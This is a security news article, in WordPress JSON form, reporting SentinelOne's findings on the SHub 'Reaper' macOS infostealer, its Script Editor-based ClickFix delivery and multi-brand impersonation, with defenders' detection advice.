{"id":8216,"date":"2026-05-20T11:49:23","date_gmt":"2026-05-20T11:49:23","guid":{"rendered":"https:\/\/cybersecurityinfocus.com\/?p=8216"},"modified":"2026-05-20T11:49:23","modified_gmt":"2026-05-20T11:49:23","slug":"shub-reaper-impersonates-apple-google-and-microsoft-in-one-macos-attack-chain","status":"publish","type":"post","link":"https:\/\/cybersecurityinfocus.com\/?p=8216","title":{"rendered":"SHub Reaper impersonates Apple, Google, and Microsoft in one MacOS attack chain"},"content":{"rendered":"
\n
\n
\n
\n
<\/div>\n

A newly disclosed macOS infostealer campaign is exploiting user trust in some of the biggest names in tech to slip past defenses.\u00a0<\/p>\n

Researchers at SentinelOne have detailed a new variant of the SHub malware family, dubbed \u201cReaper,\u201d that impersonates Apple, Google, and Microsoft at different stages of a single attack chain targeting Mac users. The SHub stealer family, identified two years back, previously used<\/a> variants relying on fake installers and ClickFix-style social engineering, often prompting victims to paste commands into Terminal.<\/p>\n

Reaper changes tactics by moving execution into Apple\u2019s Script Editor, sidestepping the protections Apple recently introduced to curb Terminal-based attacks. The end goal, however, remains credential theft, wallet compromise, and persistent access.<\/p>\n

\u201cThe SHub Reaper variant represents a noteworthy evolution in macOS infostealers by shifting away from standard social engineering tactics that require victims to manually paste commands into the Terminal,\u201d said Jason Soroko<\/a>, senior fellow at Sectigo. \u201cThis approach lowers the technical barrier for infection and demonstrates a strategic pivot toward abusing native application handlers rather than relying purely on user error.\u201d<\/p>\n

<\/a>Fake Apple updates run hidden AppleScript<\/strong><\/h2>\n

The attack starts with users pulled onto malicious websites displaying fake Apple security alerts. The pages then initiate a ClickFix workflow by instructing users to launch a supposed fix through the Script Editor, instead of the Terminal.<\/p>\n

Rather than getting the user to copy and paste shell commands like earlier, Reaper now abuses<\/a> the applescript:\/\/ URI handler to pre-populate malicious AppleScript inside Script Editor. The victim is then socially engineered, through the ClickFix<\/a>, into running the script themselves.<\/p>\n

So the victims are still executing the malware themselves, but just can\u2019t see it anymore.<\/p>\n

SentinelOne researchers noted the malware also performs several environment and anti-analysis checks before continuing execution. Once active, the malware deploys additional payloads and establishes persistence through LaunchAgents posing as legitimate vendor files.<\/p>\n

\u201cDefenders should shift macOS detection from file signatures to behavior, because Reaper executes through legitimate Apple tools and drops no obvious malicious app for a scanner to catch,\u201d said Collin Hogue-Spears<\/a>, senior director of solution management at Black Duck. \u201cScript Editor, osascript, and a LaunchAgent are all legitimate software.\u201d<\/p>\n

<\/a>The multi-brand deception<\/h2>\n

Researchers observed the malware using branding associated with multiple technology companies throughout the attack chain. Apple-themed security warnings lure victims into initiating execution, Google-related interfaces help maintain legitimacy during later stages, while Microsoft-themed domains and infrastructure are used elsewhere in the operation.<\/p>\n

\u201cReaper uses fake WeChat and Miro installers as lures, but what stands out is the way the infection chain shifts its disguise at each stage,\u201d the researchers said in a blog post<\/a>. \u201cThe payload may be hosted on a typo-squatted Microsoft domain, executed under the guise of an Apple security update, and persist from a fake Google Software Update directory.\u201d<\/p>\n

Once execution succeeds, Reaper starts harvesting sensitive user data. SentinelOne said the malware targets browser credentials, password managers, Keychain data, cryptocurrency wallets such as MetaMask and Phantom, messaging applications, and user documents.<\/p>\n

<\/a>Protection beyond blocking Terminal-pastes<\/h2>\n

SHub Reaper campaign\u2019s complete abandonment of the traditional Terminal-centric infection flow appears to be tied to Apple\u2019s recent efforts to crack down on Terminal paste abuse.<\/p>\n

In macOS Tahoe 26.4, Apple introduced protections<\/a> that display warnings when users attempt to paste potentially dangerous commands into Terminal, directly targeting the social engineering methods widely abused in ClickFix-style attacks.<\/p>\n

\u201cThis is not an Apple security failure,\u201d Hogue-spears said. \u201cIt is Apple\u2019s fix working exactly as intended. The fix raised the cost of one technique; so the crew switched to another.\u201d Apple did not immediately respond to CSO\u2019s request for comments.<\/p>\n

SentinelOne researchers recommended that defenders monitor for unusual Script Editor activity and investigate where \u201cosascript\u201d or AppleScript-related processes spawn unexpected processes or initiate outbound network connections. They also advised organizations to watch for suspicious LaunchAgent persistence mechanisms posing as legitimate Apple, Google or Microsoft components.<\/p>\n

Additionally, Soroko suggested network-based protections. \u201cSecurity teams should implement strict web filtering to intercept typo-squatted domains and monitor for anomalous invocations of the macOS Script Editor triggered directly by web browsers,\u201d he said.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>","protected":false},"excerpt":{"rendered":"

A newly disclosed macOS infostealer campaign is exploiting user trust in some of the biggest names in tech to slip past defenses.\u00a0 Researchers at SentinelOne have detailed a new variant of the SHub malware family, dubbed \u201cReaper,\u201d that impersonates Apple, Google, and Microsoft at different stages of a single attack chain targeting Mac users. The […]<\/p>\n","protected":false},"author":0,"featured_media":8217,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-8216","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-education"],"_links":{"self":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/8216"}],"collection":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8216"}],"version-history":[{"count":0,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/posts\/8216\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=\/wp\/v2\/media\/8217"}],"wp:attachment":[{"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8216"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8216"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cybersecurityinfocus.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8216"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}